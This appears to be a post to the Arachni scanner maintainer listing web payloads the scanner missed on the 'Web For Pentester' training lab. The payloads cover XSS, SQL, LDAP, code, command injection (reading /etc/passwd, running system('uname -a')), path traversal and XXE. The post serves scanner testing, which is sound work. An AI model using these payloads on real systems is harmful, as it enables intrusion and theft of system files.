False negatives against "Web For Pentester"

[0xd012]

Hi Tasos,

Maybe you would be interested in these results, even they are not related to a real application.

Arachni 1.5.1 was tested against Web For Pentester and it leads to the following false negatives.

Checks were as follow:
--checks=*,-interesting_responses,-backup*,-common_files,-backdoors,-private*,-common_directories

Hope this helps!

Regards,
Laurent.

All details to reproduce false negatives are available at Web For Pentester Course but below are further details.

XSS (FN)

• /xss/example8.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
• /xss/example9.php#<script>alert(1)</script>

SQLi (FN)

• /sqli/example7.php?id=2%0aor%201=1%20--
• /sqli/example8.php?order=age`%20ASC%23 [ASC and DESC give different results, so it is injectable]

Directory traversal (FN)

• /dirtrav/example2.php?file=/var/www/files/../../../etc/passwd

File Include (FN)

• no false negative

Code Injection (FN)

• /codeexec/example2.php?order=id);}system(%27uname%20-a%27);//
• /codeexec/example3.php?new=phpinfo()&pattern=/lamer/e&base=Hello%20lamer
• /codeexec/example4.php?name=hacker%27.phpinfo().%27

Command Injection (FN)

• /commandexec/example2.php?ip=127.0.0.1%0acat%20/etc/passwd

LDAP (FN)

• /ldap/example1.php?name=hacker
• /ldap/example2.php?name=hacker)(cn=*))%00

File Uploads (FN)

• /upload/example1.php [detected as "Form-based File Upload"]
• /upload/example2.php [detected as "Form-based File Upload"]

XML (FN)

• /xml/example1.php?xml=%3C!DOCTYPE%20test%20%5B%0A%20%20%20%20%3C!ENTITY%20x%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%0A%3Ctest%3E%26x%3B%3C%2Ftest%3E